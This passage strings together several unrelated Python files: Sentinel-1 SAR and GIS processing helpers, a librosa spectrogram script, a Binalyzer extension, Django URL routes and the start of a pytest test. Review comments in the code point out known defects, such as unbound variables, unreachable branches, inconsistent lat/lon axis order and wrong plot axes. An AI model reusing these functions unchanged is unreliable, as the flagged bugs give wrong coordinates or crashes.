    # Output:
    #    -- UTMPoints   - A N by M array of WGS 84 /UTM zone coordinate; N is number of points, 1st col is X, 2nd col is Y
    #    -- outputEPSG  - A UTM EPSG code calculated from the center of ROI
    #    -- utmProjInfo - A string contains comprehensive utm projection information
    #
    # Cast to float64 so integer input cannot truncate the transformed coords.
    WGSPoint = np.array(WGSPoint).astype(np.float64)
    if len(WGSPoint.shape)==1:
        # A single point: duplicate it so the array is always 2-D (N x 2).
        WGSPoint = np.stack((WGSPoint,WGSPoint),axis=0)
        nb,dim = np.shape(WGSPoint)
    elif len(WGSPoint.shape)==2:
        # number of WGSPoint
        nb,dim = np.shape(WGSPoint)
    elif len(WGSPoint.shape)==3:
        # NOTE(review): only prints and falls through — a 3-D input will
        # still reach the transform below and likely misbehave; confirm.
        print('ERROR: DIMENSION OF POINTS SHOULD NO MORE THAN TWO')
    # geographic coordinate (lat-lon) WGS84
    inputEPSG = 4326
    # WGS 84 / UTM zone: 327xx south of the equator, 326xx north, with the
    # zone number derived from the longitude of the first point.
    if outputEPSG==0:
        if WGSPoint[0][1]<0:
            outputEPSG = 32700
        else:
            outputEPSG = 32600
        outputEPSG = int(outputEPSG + np.floor((WGSPoint[0][0]+180)/6) + 1)
    # create coordinate transformation
    inSpatialRef = osr.SpatialReference()
    inSpatialRef.ImportFromEPSG(inputEPSG)
    outSpatialRef = osr.SpatialReference()
    outSpatialRef.ImportFromEPSG(outputEPSG)
    utmProjInfo = outSpatialRef.ExportToWkt()
    coordTransform = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)
    # transform point
    UTMPoints = np.zeros(WGSPoint.shape)
    for i in range(0,np.size(WGSPoint,axis=0)):
        p = ogr.Geometry(ogr.wkbPoint)
        # NOTE(review): points are fed as (lat, lon) here while latlon2utm
        # feeds (lon, lat) — GDAL's expected axis order differs between
        # GDAL 2 and 3; confirm which one this pipeline targets.
        p.AddPoint(WGSPoint[i][1], WGSPoint[i][0])
        p.Transform(coordTransform)
        UTMPoints[i][0] = p.GetX()
        UTMPoints[i][1] = p.GetY()
    return UTMPoints, outputEPSG, utmProjInfo
def latlon2utm(points):
    # This function transfers geographical coordinate (lon-lat) into WGS 84 / UTM zone coordinate using GDAL
    # Input:
    #    -- points - A N by M array of lon-lat coordinate; N is number of points, 1st col is longitude, 2nd col is latitude
    #
    # Output:
    #    -- points      - A N by M array of WGS 84 /UTM zone coordinate; N is number of points, 1st col is X, 2nd col is Y
    #    -- utmProjInfo - A string contains comprehensive utm projection information
    #
    # Fixed: force a float64 array (as sibling roiLatlon2UTM does).  With
    # integer input np.array(points) kept an int dtype, so the UTM coords
    # assigned below were silently truncated to whole meters.
    points = np.array(points).astype(np.float64)
    if len(points.shape)==1:
        # A single point: duplicate it so the array is always 2-D (N x 2).
        points = np.stack((points,points),axis=0)
        nb,dim = np.shape(points)
    elif len(points.shape)==2:
        # number of points
        nb,dim = np.shape(points)
    elif len(points.shape)==3:
        # NOTE(review): only prints and falls through; 3-D input still
        # reaches the transform below — confirm intended behavior.
        print('ERROR: DIMENSION OF POINTS SHOULD NO MORE THAN TWO')
    # geographic coordinate (lat-lon) WGS84
    inputEPSG = 4326
    # WGS 84 / UTM zone: 327xx south of the equator, 326xx north, with the
    # zone number derived from the longitude of the first point.
    if points[0][1]<0:
        outputEPSG = 32700
    else:
        outputEPSG = 32600
    outputEPSG = int(outputEPSG + np.floor((points[0][0]+180)/6) + 1)
    # # WGS 84 / Pseudo-Mercator
    # outputEPSG = 3857
    # create coordinate transformation
    inSpatialRef = osr.SpatialReference()
    inSpatialRef.ImportFromEPSG(inputEPSG)
    outSpatialRef = osr.SpatialReference()
    outSpatialRef.ImportFromEPSG(outputEPSG)
    utmProjInfo = outSpatialRef.ExportToWkt()
    coordTransform = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)
    # transform point (in place)
    for i in range(0,np.size(points,axis=0)):
        p = ogr.Geometry(ogr.wkbPoint)
        p.AddPoint(points[i][0], points[i][1])
        p.Transform(coordTransform)
        points[i][0] = p.GetX()
        points[i][1] = p.GetY()
    return points,utmProjInfo
def getRegion(cpath,kmlCityList):
    # Computes the pixel extent string '0,0,<width>,<height>' of the ROI
    # raster at 10 m resolution for the city addressed by cpath.
    # setting the resolution of raster image
    res = 10
    # read the unique index of city
    temp = cpath.split('/')[-1].split('_')
    idx = int(temp[1])
    # find the ROI coordinate of the city
    tree = et.parse(kmlCityList)
    for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
        if item[1][0][3].text == str(idx):
            found = item
            break
    # NOTE(review): if no Placemark matches, 'found' is unbound and the next
    # line raises NameError — confirm the kml always contains every index.
    # convert the text coordinate into WKT coordinate
    coordText = found[2][0][0][0].text
    coords = coordText.split(' ')
    # Fixed: size the arrays by the actual vertex count instead of the
    # hard-coded 5, so polygons with a different number of vertices work.
    x = np.zeros([len(coords),1])
    y = np.zeros([len(coords),1])
    for i in range(0,len(coords)):
        a,b = coords[i].split(',')
        x[i] = np.double(a)
        y[i] = np.double(b)
    xmin = np.min(x)
    xmax = np.max(x)
    ymin = np.min(y)
    ymax = np.max(y)
    points = np.array([[xmin,ymin],[xmax,ymax]])
    # convert geographic coordinate into WGS 84 / UTM zone coordinate
    points,_ = latlon2utm(points)
    # width/height in pixels from the metric extent
    widHei = np.round((points[1]-points[0])/res)
    widHei = widHei.astype(int)
    region = '0,0,'+str(widHei[0])+','+str(widHei[1])
    return region
def getPathOfCity(dpath):
    """Return the city directories under dpath, keeping only real
    directories whose name has exactly three underscore-separated parts
    (e.g. 0378_index_0033_style naming); everything else is reported and
    dropped.
    """
    # dpath = '/media/sf_So2Sat/data/massive_downloading'
    kept = []
    for candidate in glob.glob(dpath+'/*'):
        name_parts = candidate.split('/')[-1].split('_')
        if os.path.isdir(candidate) and len(name_parts) == 3:
            kept.append(candidate)
        else:
            print(candidate)
            print('The directory is either not a directory, or is not named in standard. And it has been removed')
    return kept
def getPathOfTime(cpath):
    """Return the acquisition-time sub-directories under <cpath>/original_dat."""
    return glob.glob(cpath + '/original_dat/*')
def getPath2Data(tpath):
    """Return the zip archives (downloaded Sentinel-1 scenes) directly under tpath."""
    pattern = tpath + '/*.zip'
    return glob.glob(pattern)
def gdalMosaic(zipPath, procFlag, utmEPSG, extent=0, resolution = 10):
    """Mosaic the per-scene products of one acquisition time into one GeoTIFF.

    Input/output directories are derived from zipPath[0] by string
    substitution on the 'original_dat' path component.

    Parameters:
        zipPath: list of paths to the original scene .zip files; its length
            decides between symlink/warp (1 scene) and mosaicking (>1).
        procFlag: product selector -- 1 unfiltered, 2 filtered, 3 water mask,
            4 high-res unfiltered, 5 high-res NLM filtered.
            NOTE(review): any other value leaves inputPath/outputPath
            undefined and raises NameError further down.
        utmEPSG: target EPSG code used for '-t_srs' when a 4-element extent
            is given.
        extent: 1-element ("no explicit extent") or 4-element
            [xmin, xmax, ymin, ymax] sequence.
            NOTE(review): the default scalar 0 becomes a 0-d array, so
            `extent.shape[0]` below raises IndexError -- callers apparently
            always pass a sequence; confirm.
        resolution: output pixel size in meters (default 10).

    Returns:
        3 after creating a symlink, 2 after overwriting an existing mosaic,
        or the executed gdalwarp command list.
    """
    extent = np.array(extent)
    # mosaic data of unfiltered, lee filtered, and water mask
    if procFlag == 1:
        inputPath = zipPath[0].replace('original_dat','geocoded_subset_unfilt_dat')
        outputPath = zipPath[0].replace('original_dat','mosaic_unfilt_dat')
    elif procFlag == 2:
        inputPath = zipPath[0].replace('original_dat','geocoded_subset_dat')
        outputPath = zipPath[0].replace('original_dat','mosaic_dat')
    elif procFlag == 3:
        inputPath = zipPath[0].replace('original_dat','water_mask')
        outputPath = zipPath[0].replace('original_dat','mosaic_water_mask')
    elif procFlag == 4:
        inputPath = zipPath[0].replace('original_dat','geocoded_unfilt_Hres_dat')
        outputPath = zipPath[0].replace('original_dat','mosaic_unfilt_Hres_dat')
    elif procFlag == 5:
        inputPath = zipPath[0].replace('original_dat','geocoded_Hres_dat')
        outputPath = zipPath[0].replace('original_dat','mosaic_nlm_Hres_dat')
    # every .tif in the product folder is a mosaic input
    inputPath = '/'.join(inputPath.split('/')[:-1])+'/*.tif'
    files = glob.glob(inputPath)
    # path of the first scene relative to the city root (symlink target)
    image_name = '/'.join(files[0].split('/')[-3:])
    outputPath = '/'.join(outputPath.split('/')[:-1])
    mosaicpath = outputPath +'/mosaic.tif'
    # remove any stale mosaic up front
    # NOTE(review): this makes the "overwrite existed" branch below
    # unreachable, since mosaicpath can no longer exist at that point.
    if os.path.exists(mosaicpath):
        subprocess.call(['rm',mosaicpath])
    if len(zipPath)==1:
        # only one data covers ROI, no mosaic needed
        # but make symbolic link
        # make directory if not exist
        if not os.path.exists(outputPath):
            os.makedirs(outputPath)
        # >>Jingliang, please comment
        if extent.shape[0] == 1:
            # no explicit extent: just link the single geocoded scene
            subprocess.call(['ln', '-s', '../../'+image_name, mosaicpath])
            return 3
        elif extent.shape[0] == 4:
            # explicit extent: warp the single scene onto the target grid
            comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-t_srs','EPSG:'+str(utmEPSG),'-srcnodata', '0', '-dstnodata', '0', '-tr', str(resolution), str(resolution), '-te', str(extent[0]), str(extent[2]), str(extent[1]), str(extent[3]) ]
            for idxfile in range(0,len(files)):
                comm.append(files[idxfile])
            comm.append(mosaicpath)
            subprocess.call(comm)
            return comm
    elif len(zipPath)>1:
        # more than one data cover ROI, mosaicing needed
        # forming the gdalwarp command
        # >>Jingliang, pleaser comment
        if extent.shape[0] == 1:
            comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-srcnodata', '0', '-dstnodata', '0']
            for idxfile in range(0,len(files)):
                comm.append(files[idxfile])
            comm.append(mosaicpath)
        elif extent.shape[0] == 4:
            comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-t_srs','EPSG:'+str(utmEPSG), '-srcnodata', '0', '-dstnodata', '0', '-tr', str(resolution), str(resolution), '-te', str(extent[0]), str(extent[2]), str(extent[1]), str(extent[3]) ]
            for idxfile in range(0,len(files)):
                comm.append(files[idxfile])
            comm.append(mosaicpath)
        else:
            print('ERROR: THE GIVEN EXTENT IN MOSAICING IS WRONG ')
            print(" ")
            # NOTE(review): `comm` is undefined after this branch, so the
            # subprocess.call below would raise NameError.
        # overwrite existed mosaiced file
        if os.path.exists(mosaicpath):
            # mosaiced data already exists
            print('INFO: Output file exist, now overwriting ')
            print(" ")
            subprocess.call(comm)
            return 2
        elif not os.path.exists(outputPath):
            os.makedirs(outputPath)
            subprocess.call(comm)
            return comm
        else :
            # the directory exists, but mosaic file does not exist
            subprocess.call(comm)
            return comm
def getProjTiff(cpath,tiffFolder):
    """Return the map projection (WKT) of the city's LCZ ground-truth geotiff.

    Parameters:
        cpath: city directory path ending in '<prefix>_<idx>_<CityName>'.
        tiffFolder: folder containing one subfolder per reference city.

    Returns:
        The projection reference string of the matched geotiff.
    """
    dataCityName = cpath.split('/')[-1].split('_')
    dataCityName = dataCityName[-1].lower()
    tiffCities = glob.glob(tiffFolder+'/*')
    for i in range(0,len(tiffCities)):
        tiffcity = tiffCities[i].split('/')[-1]
        cityName = tiffcity.replace('_','')
        # match the reference folder name against the lowercase city name
        if cityName in dataCityName:
            tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
            try:
                tifdat = gdal.Open(tiffPath)
            except Exception:
                # BUG FIX: str.replace returns a new string; the original
                # discarded the result and retried with the unchanged path.
                tiffPath = tiffPath.replace('.tif','.TIF')
                tifdat = gdal.Open(tiffPath)
            break
    # map projection
    # NOTE(review): if no reference city matches, `tifdat` is undefined here.
    proj = tifdat.GetProjectionRef()
    return proj
def getTiffExtent(cpath,tiffFolder):
    """Return (xmin, xmax, ymin, ymax, utmEPSG) of the city's LCZ geotiff.

    The extent is computed from the geotransform in the tiff's own projected
    coordinates; utmEPSG is the EPSG code read from the tiff's projection.
    """
    dataCityName = cpath.split('/')[-1].split('_')
    dataCityName = dataCityName[-1].lower()
    tiffCities = glob.glob(tiffFolder+'/*')
    for i in range(0,len(tiffCities)):
        tiffcity = tiffCities[i].split('/')[-1]
        cityName = tiffcity.replace('_','')
        if cityName in dataCityName:
            tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
            try:
                tifdat = gdal.Open(tiffPath)
            except Exception:
                # BUG FIX: the original discarded str.replace's return value,
                # so the uppercase-extension fallback reopened the same path.
                tiffPath = tiffPath.replace('.tif','.TIF')
                tifdat = gdal.Open(tiffPath)
            xmin, xres, xskew, ymax, yskew, yres = tifdat.GetGeoTransform()
            proj = osr.SpatialReference(wkt=tifdat.GetProjection())
            # BUG FIX: np.int was a deprecated alias of the builtin int and
            # was removed in NumPy 1.24; use int directly (same value).
            utmEPSG = int(proj.GetAttrValue('AUTHORITY',1))
            break
    # yres is negative for north-up rasters, hence ymin = ymax + rows * yres
    xmax = xmin + (tifdat.RasterXSize * xres)
    ymin = ymax + (tifdat.RasterYSize * yres)
    return xmin,xmax,ymin,ymax,utmEPSG
def getGeoRegionTiff(cpath,tiffFolder):
    """Return the buffered ROI of the city's LCZ geotiff as a WKT polygon in
    WGS84 lon/lat.

    The tiff extent is expanded by a 1 km buffer on each side (in the tiff's
    projected units), then reprojected to EPSG:4326.
    """
    dataCityName = cpath.split('/')[-1].split('_')
    dataCityName = dataCityName[-1].lower()
    tiffCities = glob.glob(tiffFolder+'/*')
    for i in range(0,len(tiffCities)):
        tiffcity = tiffCities[i].split('/')[-1]
        cityName = tiffcity.replace('_','')
        if cityName in dataCityName:
            tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
            try:
                tifdat = gdal.Open(tiffPath)
                ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
            except Exception:
                # BUG FIX: the original discarded str.replace's return value,
                # so the uppercase-extension fallback reopened the same path.
                tiffPath = tiffPath.replace('.tif','.TIF')
                tifdat = gdal.Open(tiffPath)
                ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
            break
    # lower-right corner from the geotransform (yres negative for north-up)
    lrx = ulx + (tifdat.RasterXSize * xres)
    lry = uly + (tifdat.RasterYSize * yres)
    # buffering (projected units, presumably meters for a UTM tiff)
    x_buffer = 1000
    y_buffer = 1000
    ulx = ulx - x_buffer
    lrx = lrx + x_buffer
    lry = lry - y_buffer
    uly = uly + y_buffer
    # Setup the source projection - you can also import from epsg, proj4...
    source = osr.SpatialReference()
    source.ImportFromWkt(tifdat.GetProjection())
    # The target wgs84/lonlat projection
    target = osr.SpatialReference()
    target.ImportFromEPSG(4326)
    # Create the transform - this can be used repeatedly
    transform = osr.CoordinateTransformation(source, target)
    # Transform the point. You can also create an ogr geometry and use the more generic `point.Transform()`
    ul = transform.TransformPoint(ulx, uly)
    lr = transform.TransformPoint(lrx, lry)
    # ROI coordinates in WGS84/lonlat
    coordinate = [ul[0],lr[0],lr[1],ul[1]]
    # map projection
    xmin = coordinate[0]
    xmax = coordinate[1]
    ymin = coordinate[2]
    ymax = coordinate[3]
    # closed rectangle ring: ll -> lr -> ur -> ul -> ll
    ring = ogr.Geometry(ogr.wkbLinearRing)
    ring.AddPoint(xmin,ymin)
    ring.AddPoint(xmax,ymin)
    ring.AddPoint(xmax,ymax)
    ring.AddPoint(xmin,ymax)
    ring.AddPoint(xmin,ymin)
    poly = ogr.Geometry(ogr.wkbPolygon)
    poly.AddGeometry(ring)
    georegion = poly.ExportToWkt()
    return georegion
def getRegionTiff(cpath,tiffFolder):
    """Return the pixel region string '0,0,<width>,<height>' of the city's
    LCZ geotiff at 10 m resolution, padded by 100 pixels in each dimension.
    """
    dataCityName = cpath.split('/')[-1].split('_')
    dataCityName = dataCityName[-1].lower()
    tiffCities = glob.glob(tiffFolder+'/*')
    for i in range(0,len(tiffCities)):
        tiffcity = tiffCities[i].split('/')[-1]
        cityName = tiffcity.replace('_','')
        if cityName in dataCityName:
            tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
            try:
                tifdat = gdal.Open(tiffPath)
                ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
            except Exception:
                # BUG FIX: the original discarded str.replace's return value,
                # so the uppercase-extension fallback reopened the same path.
                tiffPath = tiffPath.replace('.tif','.TIF')
                tifdat = gdal.Open(tiffPath)
                ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
            break
    lrx = ulx + (tifdat.RasterXSize * xres)
    lry = uly + (tifdat.RasterYSize * yres)
    # width/height in 10 m pixels, plus a 100-pixel safety margin
    width = int((lrx-ulx)/10+100)
    height = int((uly-lry)/10+100)
    region = '0,0,'+str(width)+','+str(height)
    return region
def readSEN1TIFF2NLSAR(path):
    # this function read Sentinel-1 geotiff data, and organizes it into the format of NLSAR software
    # path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_rangeAzimuth.tif'
    #
    # The 4 bands are assumed to be i_VH, q_VH, i_VV, q_VV (same order as the
    # DIM reader below) -- TODO confirm for the geotiff export.
    # Output: (rows, cols, 2, 2) complex64 covariance stack.
    try:
        tifID = gdal.Open(path)
    except RuntimeError:
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        print("ERROR: the given SENTINEL-1 geotiff can not be open by GDAL")
        print("DIRECTORY: "+path)
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        sys.exit(1)
    data = tifID.ReadAsArray()
    dn,rw,cl = data.shape
    nlsardata = np.zeros((rw,cl,2,2),dtype=np.complex64)
    # C11 = |ch1|^2 with ch1 = data[0] + j*data[1]
    nlsardata[:,:,0,0] = np.square(data[0,:,:])+np.square(data[1,:,:])
    # C12 = ch1 * conj(ch2) = (ac + bd) + j(bc - ad), ch2 = data[2] + j*data[3]
    nlsardata[:,:,0,1] = (data[0,:,:]*data[2,:,:]+data[1,:,:]*data[3,:,:])+(data[1,:,:]*data[2,:,:]-data[0,:,:]*data[3,:,:])*1j
    # C21 = conj(C12): the covariance matrix is Hermitian
    nlsardata[:,:,1,0] = np.conjugate(nlsardata[:,:,0,1])
    # C22 = |ch2|^2
    nlsardata[:,:,1,1] = np.square(data[2,:,:])+np.square(data[3,:,:])
    return nlsardata
def readSEN1DimComplex2NLSAR(path):
    # this function read Sentinel-1 data in its DIM form, and organizes it into the format of NLSAR software
    # path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_Orb_Cal_Deb_Sub.data'
    #
    # Reads the real/imag bands of VH and VV from a BEAM-DIMAP .data folder
    # and builds the (rows, cols, 2, 2) complex64 covariance stack used by
    # the NL-SAR toolbox.
    files = ['/i_VH.img','/q_VH.img','/i_VV.img','/q_VV.img']
    # intial data array to store data in memory (sized from the first band)
    fid = gdal.Open(path+files[0])
    data = np.zeros((len(files),fid.RasterYSize,fid.RasterXSize),dtype = np.float32)
    del fid
    # read data, one band file at a time
    for i in range(0,len(files)):
        fid = gdal.Open(path+files[i])
        data[i,:,:] = fid.ReadAsArray()
        del fid
    # save the data into nlsartoolbox format
    dn,rw,cl = data.shape
    nlsardata = np.zeros((rw,cl,2,2),dtype=np.complex64)
    # C11 = |VH|^2 with VH = i_VH + j*q_VH
    nlsardata[:,:,0,0] = np.square(data[0,:,:])+np.square(data[1,:,:])
    # C12 = VH * conj(VV) = (ac + bd) + j(bc - ad), VV = i_VV + j*q_VV
    nlsardata[:,:,0,1] = (data[0,:,:]*data[2,:,:]+data[1,:,:]*data[3,:,:])+(data[1,:,:]*data[2,:,:]-data[0,:,:]*data[3,:,:])*1j
    # C21 = conj(C12): the covariance matrix is Hermitian
    nlsardata[:,:,1,0] = np.conjugate(nlsardata[:,:,0,1])
    # C22 = |VV|^2
    nlsardata[:,:,1,1] = np.square(data[2,:,:])+np.square(data[3,:,:])
    return nlsardata
def nlsarData2SEN1DimCovariance(nlsarData,path):
    # this function write NLSAR data covariance matrix into a SEN1 DIM file, in its covariance matrix format
    # path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_nlm_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_Orb_Cal_Deb_Spk_Sub.data'
    #
    # Each band file receives one component of the 2x2 Hermitian covariance
    # matrix: C11, Re(C12), Im(C12), C22.
    files = ['/C11.img','/C12_real.img','/C12_imag.img','/C22.img']
    from osgeo.gdalconst import GA_Update
    # Components in the same order as `files`.
    components = [
        np.real(nlsarData[:,:,0,0]),   # C11
        np.real(nlsarData[:,:,0,1]),   # Re(C12)
        np.imag(nlsarData[:,:,0,1]),   # Im(C12)
        np.real(nlsarData[:,:,1,1]),   # C22
    ]
    for i in range(0,len(files)):
        fid = gdal.Open(path+files[i],GA_Update)
        bnd = fid.GetRasterBand(1)
        # FIX: the original read the whole band with ReadAsArray() into a
        # variable that was unconditionally overwritten -- a wasted full read.
        bnd.WriteArray(components[i])
        bnd.FlushCache()
        del bnd,fid
def terrainCorrection(dimPath, template, projection):
    # this function accomplishes terrain correction using SNAP tool box, mainly for unfiltered data in higher resolution
    """Run SNAP (gpt) terrain correction on an unfiltered *_Sub.dim product.

    Parameters:
        dimPath: path to the '*_Sub.dim' input product.
        template: path to the SNAP graph XML template.
        projection: projection text for the Terrain-Correction node, or 0 to
            keep the template's default.

    Returns 0 when the `gpt` executable cannot be located via the `gpt`
    environment variable; otherwise None (the gpt call's output goes to
    stdout/stderr).
    """
    try:
        gptdir = os.environ['gpt']
    except KeyError:
        # FIX(idiom): only the missing-variable case is expected here; a bare
        # except would also swallow e.g. KeyboardInterrupt.
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        return 0
    # get the directory to the output file
    outputData = dimPath.replace('_Sub.dim','_Sub_TC.tif')
    outputData = outputData.replace('rangeAzimuth_dat','geocoded_unfilt_Hres_dat')
    outputPath = '/'.join(outputData.split('/')[:-1])
    if not os.path.exists(outputPath):
        os.makedirs(outputPath)
    # read and configure XML file
    # FIX: the original performed this whole parse/configure/write sequence
    # twice, verbatim; once is sufficient (the second pass rewrote the same
    # file with identical content).
    tree = et.parse(template)
    root = tree.getroot()
    for node in root.findall('node'):
        if node[0].text == 'Read':
            node[2][0].text = dimPath
        elif node[0].text == 'Write':
            node[2][0].text = outputData
        elif node[0].text == 'Terrain-Correction' and projection != 0:
            # node[2][9] is assumed to be the map-projection parameter of
            # this particular template -- TODO confirm against the template.
            node[2][9].text = projection
    # save the configuration
    xmldir = outputPath + "/Preprocessing_TC.xml"
    tree.write(xmldir)
    print("#############################################################")
    print("INFO: Terrain correction of the unfiltered data")
    print("#############################################################")
    subprocess.call([gptdir,xmldir])
def nlmTerrainCorrection(dimPath, template, projection):
    # this function accomplishes terrain correction using SNAP tool box, mainly for nlm filtered data in higher resolution
    """Run SNAP (gpt) terrain correction on an NLM-filtered *_Sub.dim product.

    Parameters:
        dimPath: path to the '*_Sub.dim' input product.
        template: path to the SNAP graph XML template.
        projection: projection text for the Terrain-Correction node, or 0 to
            keep the template's default.

    Returns 0 when the `gpt` executable cannot be located via the `gpt`
    environment variable; otherwise None.
    """
    try:
        gptdir = os.environ['gpt']
    except KeyError:
        # FIX(idiom): narrowed from a bare `except:` -- only a missing env
        # variable is expected here.
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        return 0
    # get the directory to the output file
    outputData = dimPath.replace('_Sub.dim','_Sub_TC.tif')
    outputData = outputData.replace('rangeAzimuth_nlm_dat','geocoded_Hres_dat')
    outputPath = '/'.join(outputData.split('/')[:-1])
    if not os.path.exists(outputPath):
        os.makedirs(outputPath)
    # read and configure XML file
    tree = et.parse(template)
    root = tree.getroot()
    for node in root.findall('node'):
        if node[0].text == 'Read':
            node[2][0].text = dimPath
        elif node[0].text == 'Write':
            node[2][0].text = outputData
        elif node[0].text == 'Terrain-Correction' and projection != 0:
            # node[2][9] is assumed to be the map-projection parameter of
            # this particular template -- TODO confirm against the template.
            node[2][9].text = projection
    # save the configuration
    xmldir = outputPath + "/Preprocessing_TC.xml"
    tree.write(xmldir)
    print("#############################################################")
    print("INFO: Terrain correction of the nlm filtered data")
    print("#############################################################")
    subprocess.call([gptdir,xmldir])
|
import librosa as lc
import matplotlib.pyplot as plt
import numpy as np
fs = 16000   # sampling rate [Hz]
n_fft = 512  # FFT length
# Frequency axis for plotting (one value per rfft bin).
# NOTE(review): dividing by (n_fft/2) scales the top bin to fs, but rfft bins
# span 0..fs/2 -- this looks like a factor-2 axis error; confirm. The correct
# form would be fs*k/n_fft.
f = fs*np.array(range(int(1+n_fft/2)))/(n_fft/2)
def stft(path):
    """Load an audio file and display the magnitude of its STFT.

    Assumes the file's native sample rate matches the module-level `fs`
    (lc.load uses sr=None, i.e. no resampling) -- TODO confirm.
    """
    # Load a file
    data = lc.load(path,sr=None)
    length = len(data[0])
    # 512-point FFT with a 160-sample hop and 400-sample Hann window
    # (10 ms hop / 25 ms window at 16 kHz)
    spec = np.array(lc.stft(data[0], n_fft=512, hop_length=160, win_length=400, window='hann'))
    # NOTE(review): the time axis divides the frame index by fs; converting a
    # frame index to seconds should be index*hop_length/fs -- looks like the
    # x-axis is off by a factor of hop_length; confirm.
    plt.pcolormesh(np.array(range(int(length/160+1)))/fs, f, np.abs(spec))
    plt.colorbar()
    plt.title('STFT Magnitude')
    plt.ylabel('Frequency [Hz]')
    plt.xlabel('Time [sec]')
    plt.tight_layout()
    plt.show()
# Script entry: plot the STFT of a sample recording in the working directory.
stft('vavle.00.normal.00000023.wav')
"""
binalyzer_core.extension
~~~~~~~~~~~~~~~~~~~~~~~~
This module supports the creation of Binalyzer extensions.
"""
from binalyzer_core import (
BinalyzerExtension,
TemplateFactory,
ValueProviderBase,
value_cache,
)
class UtilityExtension(BinalyzerExtension):
    """Binalyzer extension registered under the name `utils`, handing out
    helper value providers."""

    def __init__(self, binalyzer=None):
        super().__init__(binalyzer, "utils")

    def init_extension(self):
        super().init_extension()

    def count(self, property):
        """Return a provider that counts records for the given property."""
        return CountValueProvider(property)
class CountValueProvider(ValueProviderBase):
    """Counts how many consecutive records of the bound template fit into the
    underlying data stream, starting at the template's absolute address."""

    def __init__(self, property):
        super(CountValueProvider, self).__init__(property)

    @value_cache
    def get_value(self):
        # Clone the template so that re-anchoring its offset below does not
        # mutate the caller's template.
        template = TemplateFactory().clone(self.property.template)
        template.binding_context = self.property.template.binding_context
        # seek(0, 2) (seek to end) returns the size of the bound data stream.
        total_data_size = self.property.template.binding_context.data.seek(0, 2)
        packet_record_address = self.property.template.absolute_address
        packet_record_count = 0
        while True:
            if packet_record_address >= total_data_size:
                break
            # Anchor the clone at the current record and step over it; the
            # template's size may differ per record (data-dependent layouts).
            template.offset = packet_record_address
            packet_record_address = template.absolute_address + template.size
            packet_record_count += 1
        return packet_record_count

    def set_value(self, value):
        # The count is derived from the data; writing it back is unsupported.
        raise RuntimeError("Not implemented, yet.")
|
from django.urls import path
from . import views
urlpatterns = [
    # Landing page and authentication.
    path("", views.index, name="index"),
    path("login", views.login_view, name="login"),
    path("logout", views.logout_view, name="logout"),
    path("register", views.register, name="register"),
    # Listing creation and category browsing.
    path("createlisting", views.createListing, name="createListing"),
    path("categories", views.categories, name="categories"),
    path("categories/<str:category>", views.category, name="category"),
    # Single-listing page and its actions (bid, close, comments).
    path("listings/<int:listingId>", views.listing, name="listing"),
    path("listings/<int:listingId>/bid", views.bid, name="bid"),
    path("listings/<int:listingId>/closelisting", views.closeListing, name="closelisting"),
    path("listings/<int:listingId>/comment", views.comment, name="comment"),
    path("listings/<int:listingId>/deletecomment", views.deletecomment, name="deletecomment"),
    # Per-user listing and watchlist pages (both names map to userListings).
    path("users/<str:username>/listings", views.userListings, name="userlistings"),
    path("users/<str:username>/mylistings", views.userListings, name="mylistings"),
    path("users/<str:username>/watchlist", views.watchlist, name="watchlist"),
    path("users/<str:username>/watchlist/alterwatchlist", views.alterWatchlist, name="alterWatchlist")
]
|
from pathlib import Path
from unittest.mock import patch
import pytest
from zenithml.data import BQDataset
from zenithml.data import ParquetDataset
from zenithml.preprocess import Numerical, StandardNormalizer
from zenithml.preprocess import Preprocessor
def test_parquet_dataset(test_df, datasets, tmp_path):
    """ParquetDataset exposes row count, a Preprocessor instance and the
    configured transformed-data location."""
    test_df_path = str(datasets["dummy_df"])
    transformed_data_loc = str(Path(test_df_path) / "transformed_dataset")
    ds = ParquetDataset(
        data_loc=test_df_path,
        working_dir=tmp_path,
        transformed_data_loc=transformed_data_loc,
    )
    assert ds.base_nvt_dataset.num_rows == len(test_df)
    assert isinstance(ds.preprocessor, Preprocessor)
    assert str(ds.transformed_data_loc) == transformed_data_loc
def test_parquet_dataset_variables(datasets, tmp_path):
